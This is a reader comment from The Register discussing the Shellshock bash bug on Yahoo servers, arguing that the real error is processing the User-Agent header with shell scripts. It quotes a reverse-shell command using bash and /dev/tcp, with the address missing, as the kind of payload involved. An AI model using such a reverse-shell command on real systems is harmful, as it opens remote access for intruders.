Reply to post: Re: Bash is Bollocks for security

Yahoo servers? SHELLSHOCKED? by Bash?

Destroy All Monsters Silver badge

Re: Bash is Bollocks for security

Amazingly, a tool is being used as a tool.

Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.

Whether "Bash is Bollocks for security" is neither here nor there.

The error here consists in making the swiss army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the swiss army knife available in the first place.

"/bin/bash –i >&/dev/tcp/ 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.

Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2021